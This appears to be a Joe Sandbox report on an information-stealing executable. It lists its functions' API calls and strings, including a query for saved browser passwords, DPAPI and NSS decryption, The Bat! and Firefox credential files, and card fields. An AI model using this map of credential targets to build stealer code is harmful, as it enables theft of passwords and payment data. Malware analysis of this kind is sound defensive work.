Instruction Fuzzy Hash: C7A11D7190128DAFDB21EFA0CD89FEE37ACEF44304F40416AE909AB191EB749748CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00409559 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 239networkcomfileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00409578
InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004095B2
InternetReadFile.WININET(00000010,?,000003E8,?), ref: 004095CC
_memmove.LIBCMT ref: 00409601
_memset.LIBCMT ref: 00409632
HttpQueryInfoA.WININET(00000010,0000001D,?,?,00000000), ref: 00409648
CoCreateInstance.OLE32(0047F67C,00000000,00000001,0047F68C,0000002F), ref: 0040966D
_memcpy_s.LIBCMT ref: 00409777
_memcpy_s.LIBCMT ref: 0040979F

Strings

text, xrefs: 004096D5

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: FileInternet_memcpy_s$CreateH_prolog3HttpInfoInstancePointerQueryRead_memmove_memset
String ID: text
API String ID: 1196634669-999008199
Opcode ID: 0c8f73a7d178212ea71b31bdd9b81d0c856b77930c5063e3df8fb0d928e8ed33
Instruction ID: 44cd279dfd805bacaa3d01731d98bbcf42e0aaa941c71d0c0edd821f97b877ea
Opcode Fuzzy Hash: 0c8f73a7d178212ea71b31bdd9b81d0c856b77930c5063e3df8fb0d928e8ed33
Instruction Fuzzy Hash: 579158B2900209EFCB10DFA9C9859AFBBF9FF48304B50452EF905A7652D738AD44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040F72A Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 278fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040F734
__wgetenv.LIBCMT ref: 0040F744

Part of subcall function 00404656: __EH_prolog3.LIBCMT ref: 0040465D

Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,00000000,000003E8,?,00000000,?,?,?,004096C0,00000104,00000104,?), ref: 0045344E
Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,?,?,00000000,?,?,?,004096C0,00000104,00000104,?,?), ref: 0045347D

FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 0040F7BB
GetFileAttributesW.KERNEL32(00000000,?,00000000,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040F889
FindNextFileW.KERNEL32(?,?), ref: 0040FAC1

Strings

\The Bat!\, xrefs: 0040F762, 0040F767, 0040F83D, 0040F8DF, 0040FA1F
\Account.CFN, xrefs: 0040FA48
APPDATA, xrefs: 0040F739
\Account.CFN, xrefs: 0040F95B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: File$ByteCharFindMultiWide$AttributesFirstH_prolog3H_prolog3_Next__wgetenv
String ID: APPDATA$\Account.CFN$\Account.CFN$\The Bat!\
API String ID: 3440365520-3349360293
Opcode ID: 16c231a74676d8b5773d61df5d9aae1cca850e4c4dea95e500603a92d5c357b4
Instruction ID: a053cc659268fe928ffb6af3e91cf34737b7ab004d579ed009694f835ad21573
Opcode Fuzzy Hash: 16c231a74676d8b5773d61df5d9aae1cca850e4c4dea95e500603a92d5c357b4
Instruction Fuzzy Hash: 0FB111B1C00258AEDB25DBA5CC85FDEB7BCAF15308F0041AEF509B6192DA785B48CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040D053 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190encryptionCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040D06F

Part of subcall function 0040C28E: __EH_prolog3.LIBCMT ref: 0040C295

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

_malloc.LIBCMT ref: 0040D1A4
_memmove.LIBCMT ref: 0040D1C2
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D1D7

Part of subcall function 0040C2F8: __EH_prolog3.LIBCMT ref: 0040C2FF

Part of subcall function 004032BE: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004032D0

Strings

Login: , xrefs: 0040D17D
Soft: , xrefs: 0040D128
SELECT action_url, username_value, password_value FROM logins, xrefs: 0040D0D1
Password: , xrefs: 0040D1E6
Host: , xrefs: 0040D152

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: H_prolog3$_memmove$CryptDataIos_base_dtorUnprotect_mallocstd::ios_base::_
String ID: Host: $Login: $Password: $SELECT action_url, username_value, password_value FROM logins$Soft:
API String ID: 2830029677-373627977
Opcode ID: 10bd31a69c7719eb1557b85d1ccc85b1cd8682bb60449f8ce59e11575653c3e4
Instruction ID: 25983e3b660c2ae9aea7d4a95f0b71e4838db9843ab0b8f5eda3fdfaa6708ca8
Opcode Fuzzy Hash: 10bd31a69c7719eb1557b85d1ccc85b1cd8682bb60449f8ce59e11575653c3e4
Instruction Fuzzy Hash: 485194B1900209AECF14FF65DC46EDE7BACEF04308F10446FFD05B6192DA789A548B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3A5 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 187encryptionCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040D3C1

Part of subcall function 0040C28E: __EH_prolog3.LIBCMT ref: 0040C295

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

_malloc.LIBCMT ref: 0040D501
_memmove.LIBCMT ref: 0040D51F
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D534

Part of subcall function 0040C2F8: __EH_prolog3.LIBCMT ref: 0040C2FF

Part of subcall function 004032BE: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004032D0

Strings

Card: , xrefs: 0040D543
Month: , xrefs: 0040D4AD
Name: , xrefs: 0040D482
Year: , xrefs: 0040D4DA
`M~, xrefs: 0040D418

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: H_prolog3$_memmove$CryptDataIos_base_dtorUnprotect_mallocstd::ios_base::_
String ID: Card: $Month: $Name: $Year: $`M~
API String ID: 2830029677-1075304976
Opcode ID: c086d78fa1dedb4df07103cd38335ef389b8ccef969cd25d6896ad459acd176f
Instruction ID: ce8b845565e0b2be6fcfac2ec75591affdbbba7196f6de68850dfd2df8e639bc
Opcode Fuzzy Hash: c086d78fa1dedb4df07103cd38335ef389b8ccef969cd25d6896ad459acd176f
Instruction Fuzzy Hash: AB5186B1900209BEDF04BF65DC42E9E7BACEF14348F00446FFD05B6192DA789A548BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1C4 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 397fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040F1CE

Part of subcall function 0040ADF5: __EH_prolog3.LIBCMT ref: 0040ADFC
Part of subcall function 0040ADF5: __wgetenv.LIBCMT ref: 0040AE16
Part of subcall function 0040ADF5: LoadLibraryA.KERNEL32(00000000,00411D33,C:\ProgramData), ref: 0040AE5A
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 0040AE76
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0040AE83
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 0040AE90
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 0040AE9D
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 0040AEAA
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 0040AEB7
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,sqlite3_open), ref: 0040AEC4
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,sqlite3_prepare_v2), ref: 0040AED1
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,sqlite3_step), ref: 0040AEDE
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,sqlite3_column_text), ref: 0040AEEB

__wgetenv.LIBCMT ref: 0040F21E
FindFirstFileW.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,007F3F70,00000000), ref: 0040F2B5

Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,00000000,000003E8,?,00000000,?,?,?,004096C0,00000104,00000104,?), ref: 0045344E
Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,?,?,00000000,?,?,?,004096C0,00000104,00000104,?,?), ref: 0045347D

GetFileAttributesW.KERNEL32(00000000,?,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,?,?,?,?,007F3F70,00000000), ref: 0040F3B0

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

FindNextFileW.KERNEL32(?,?), ref: 0040F6FF
FindClose.KERNEL32(?), ref: 0040F713

Part of subcall function 00453074: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,0000000F,?,00000000,?,?,?,0045097C,?), ref: 004530A5
Part of subcall function 00453074: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000008), ref: 004530C8

Part of subcall function 00404656: __EH_prolog3.LIBCMT ref: 0040465D

Strings

\logins.json, xrefs: 0040F617
\logins.json, xrefs: 0040F491

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: AddressProc$ByteCharMultiWide$FileFind$H_prolog3__wgetenv$AttributesCloseFirstH_prolog3_LibraryLoadNext_memmove
String ID: \logins.json$\logins.json
API String ID: 1618705809-3678638610
Opcode ID: e362fa31640b6f737862ec271bc5829645db24aae21caebd4655ac64960c6b65
Instruction ID: eb95015e9cb6b92b21826430fb4b646fc663ace8cbdc488126ab3086b71bdd6d
Opcode Fuzzy Hash: e362fa31640b6f737862ec271bc5829645db24aae21caebd4655ac64960c6b65
Instruction Fuzzy Hash: 53F152B180025CAEDB15DBA5CC85BDEB7BCAF15304F0041AEE209B7192DA785B88CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00450D1B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00450D3A
GetKeyboardLayoutList.USER32(00000000,00000000,00000018), ref: 00450D6E
LocalAlloc.KERNEL32(00000040,00000000), ref: 00450D79
GetKeyboardLayoutList.USER32(?,00000000), ref: 00450D86
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00450DAD
_memset.LIBCMT ref: 00450E2F

Part of subcall function 00404656: __EH_prolog3.LIBCMT ref: 0040465D

Part of subcall function 00404147: _memmove.LIBCMT ref: 00404169

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

LocalFree.KERNEL32(?), ref: 00450E4E

Strings

/ , xrefs: 00450DB8

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: H_prolog3KeyboardLayoutListLocal_memmove$AllocFreeInfoLocale_memset
String ID: /
API String ID: 680995659-4001269591
Opcode ID: 1f9e855846f95a19ff5395ff3fb3d3197c93071ed516e58c0e9899e138048132
Instruction ID: 39d12f9060af45ea850c16868a86e30f17d7daec455d56ee2a959c0d380deb92
Opcode Fuzzy Hash: 1f9e855846f95a19ff5395ff3fb3d3197c93071ed516e58c0e9899e138048132
Instruction Fuzzy Hash: F14150B1900209AFDB10EF95CC85AEEB7B8FF58304F50442EFA15A7281D7785A48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0042226B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00422274

Part of subcall function 00415BB5: GetVersionExA.KERNEL32(?), ref: 00415BE2

FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 0042229B
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004222C4
LocalFree.KERNEL32(?), ref: 004222DF
_free.LIBCMT ref: 00422313

Part of subcall function 00415C62: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76C85970,?,00415D8B,?), ref: 00415C80
Part of subcall function 00415C62: _malloc.LIBCMT ref: 00415C87

Strings

OsError 0x%x (%u), xrefs: 004222EB

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWide_free_malloc
String ID: OsError 0x%x (%u)
API String ID: 2239202424-2664311388
Opcode ID: 4dffd3e4ce8cc5b60de909c122c490a494dbf6c8124a6907ac0223106e6ebd6a
Instruction ID: c4d856034d43d498b7e022209bc933d00304237615574f0c93aa57c9d3c78093
Opcode Fuzzy Hash: 4dffd3e4ce8cc5b60de909c122c490a494dbf6c8124a6907ac0223106e6ebd6a
Instruction Fuzzy Hash: F811B131A00128FBCB126BA1ED49CDF7F79EF44750B504066F504A5121D7BA4A91DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00456AB1 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 462COMMON

Download Yara Rule

Strings

UT, xrefs: 00456DB1

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID:
String ID: UT
API String ID: 0-894488996
Opcode ID: aa20af61844151f89333f6ce3554bb53823e3af7bef0c352d169089b6f1fc8cc
Instruction ID: eaf72d81879996882fa901feb04274233a5223577146fc7c682b00fd40ba9db3
Opcode Fuzzy Hash: aa20af61844151f89333f6ce3554bb53823e3af7bef0c352d169089b6f1fc8cc
Instruction Fuzzy Hash: 5A021170E042988BDF25CF68C8907EE7BA1AF55305F55406FEC49AF387D6389948CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00429DA3 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 384COMMON

Download Yara Rule

Strings

oid, xrefs: 00429E6A
old, xrefs: 00429E27
foreign key constraint failed, xrefs: 0042A02F
new, xrefs: 00429E31

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID:
String ID: foreign key constraint failed$new$oid$old
API String ID: 0-1953309616
Opcode ID: 94c87d0c494a13ffc942f5159dd6f06d7c08b7733fbde62c41e317ec3259314e
Instruction ID: fba612bb7a679aad436e3514bd8e6dda0ad44a98a5f02e2a813b8d01e28c7046
Opcode Fuzzy Hash: 94c87d0c494a13ffc942f5159dd6f06d7c08b7733fbde62c41e317ec3259314e
Instruction Fuzzy Hash: F0E18F71E00219EFDF04DFA5D881AEEBBB5FF48314F54802AE904AB241DB789E51CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004108CF Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207encryptionCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004108EB

Part of subcall function 0040C28E: __EH_prolog3.LIBCMT ref: 0040C295

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

_malloc.LIBCMT ref: 00410A45
_memmove.LIBCMT ref: 00410A63
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410A78

Part of subcall function 0040C2F8: __EH_prolog3.LIBCMT ref: 0040C2FF

Part of subcall function 004032BE: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004032D0

Strings

TRUE/FALSE1830365600, xrefs: 004109F7

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: H_prolog3$_memmove$CryptDataIos_base_dtorUnprotect_mallocstd::ios_base::_
String ID: TRUE/FALSE1830365600
API String ID: 2830029677-1810158349
Opcode ID: aba3d5f3b5d8acda03dd1f70341ffde45a4698247a94d745de5e2bf79326caac
Instruction ID: 07b12fa688640a15bc7960484feb95ec19d3385c70a5cb0f67f159c58cbd26d8
Opcode Fuzzy Hash: aba3d5f3b5d8acda03dd1f70341ffde45a4698247a94d745de5e2bf79326caac
Instruction Fuzzy Hash: 6561A6B1400209AEDF04EF65DC82EDE7BACEF14354F10406FFD0597292EB789A948B99

Uniqueness

Uniqueness Score: -1.00%

Function 00468E6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,004694A9,?,0045D392,?,000000BC,?,00000001,00000000,00000000), ref: 00468EAB
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,004694A9,?,0045D392,?,000000BC,?,00000001,00000000,00000000), ref: 00468ED4
GetACP.KERNEL32(?,?,004694A9,?,0045D392,?,000000BC,?,00000001,00000000), ref: 00468EE8

Strings

OCP, xrefs: 00468E8C
ACP, xrefs: 00468E7B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 80f509c35193b0fbd8062ff62606e887ea546174c169190112341de85200745f
Instruction ID: c5fb2461835c9f9dffb0f1e907dcce7f8ae956cbf052d7f02711ee3eafa9fcbf
Opcode Fuzzy Hash: 80f509c35193b0fbd8062ff62606e887ea546174c169190112341de85200745f
Instruction Fuzzy Hash: 7C01B530A01606BAEB25DB61EC05BAB73ACAB50359F20052FF505E1191FF69CE41865E

Uniqueness

Uniqueness Score: -1.00%

Function 00458B31 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0045F2A7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0045F2BC
UnhandledExceptionFilter.KERNEL32(004802C0), ref: 0045F2C7
GetCurrentProcess.KERNEL32(C0000409), ref: 0045F2E3
TerminateProcess.KERNEL32(00000000), ref: 0045F2EA

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 55492e6b17b949e0503eca9e2b00f703c89433c177583683b474d030af67fb80
Instruction ID: 66d94ee2445cfa509373b949c5a56c5586e91970c1e76c9ec34d866448afb6b1
Opcode Fuzzy Hash: 55492e6b17b949e0503eca9e2b00f703c89433c177583683b474d030af67fb80
Instruction Fuzzy Hash: DC21D4B5811304DFD700EF95F984A183BE4BB08751F4088BEF908932A1E7B45986CF6E

Uniqueness

Uniqueness Score: -1.00%

Function 004164C4 Relevance: 6.1, APIs: 4, Instructions: 60timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 004164E8
GetCurrentProcessId.KERNEL32 ref: 00416506
GetTickCount.KERNEL32 ref: 0041651B
QueryPerformanceCounter.KERNEL32(?), ref: 00416532

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CountCounterCurrentPerformanceProcessQuerySystemTickTime
String ID:
API String ID: 4122616988-0
Opcode ID: cc56e06615ca9488b9a274329dbec4dd913a08705cf16c5455ae8fdc583eb6f1
Instruction ID: 2be957ba54a93486295d3d3aeeecb2488d19412a77dfda47644b52a4b3daea7f
Opcode Fuzzy Hash: cc56e06615ca9488b9a274329dbec4dd913a08705cf16c5455ae8fdc583eb6f1
Instruction Fuzzy Hash: AD118676A005559BCF00DFB8DD884DDB7FAEF49314752407AED06E7204C775EA818B54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A053 Relevance: 4.6, APIs: 3, Instructions: 88encryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A090
CryptStringToBinaryA.CRYPT32(?,?,00000001,?,?,00000000,00000000), ref: 0040A0B4
_memmove.LIBCMT ref: 0040A10E

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: BinaryCryptString_memmove_memset
String ID:
API String ID: 369080642-0
Opcode ID: 3fad511607be4897bcbcef5ca03891267fce27fba98e4c1e2a95364786043080
Instruction ID: d829430e433b674ff8e6b9f7cb69cdb602b8f236c1569073fbfad352a091ec26
Opcode Fuzzy Hash: 3fad511607be4897bcbcef5ca03891267fce27fba98e4c1e2a95364786043080
Instruction Fuzzy Hash: AF310C7290021D9FDB14DFA59C899EEB7BDEB08344F04047EF90AE7241EB349918CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004223F4 Relevance: 4.6, APIs: 3, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00422322: GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 0042234D
Part of subcall function 00422322: _malloc.LIBCMT ref: 00422356
Part of subcall function 00422322: _free.LIBCMT ref: 00422366

Part of subcall function 00415BB5: GetVersionExA.KERNEL32(?), ref: 00415BE2

GetDiskFreeSpaceW.KERNEL32(00000000,?,?,?,?,000000FF,000000FF,00000000), ref: 00422484
GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?,000000FF,000000FF,00000000), ref: 004224AC
_free.LIBCMT ref: 004224B5

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: DiskFreeSpace_free$FullNamePathVersion_malloc
String ID:
API String ID: 138112127-0
Opcode ID: 3d556bd7c9a5fe1f21ab12df0f45f7858eba1d9bfe1c0c8b673f62f46aa64d6e
Instruction ID: d981ededea871a66579fca7ad5d74c13c06ac04a48a015a1b113085c246aac8e
Opcode Fuzzy Hash: 3d556bd7c9a5fe1f21ab12df0f45f7858eba1d9bfe1c0c8b673f62f46aa64d6e
Instruction Fuzzy Hash: 5521E972A00128AFEB31FBB4DD44AEF77ACFF05304F54005BE915D7201EAB859448B69

Uniqueness

Uniqueness Score: -1.00%

Function 00453605 Relevance: 4.6, APIs: 3, Instructions: 72fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0045360F

Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,00000000,000003E8,?,00000000,?,?,?,004096C0,00000104,00000104,?), ref: 0045344E
Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,?,?,00000000,?,?,?,004096C0,00000104,00000104,?,?), ref: 0045347D

FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,004081C2,?,?,?,?,?,?,?,00000024), ref: 00453648
FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00000024), ref: 004536D9

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

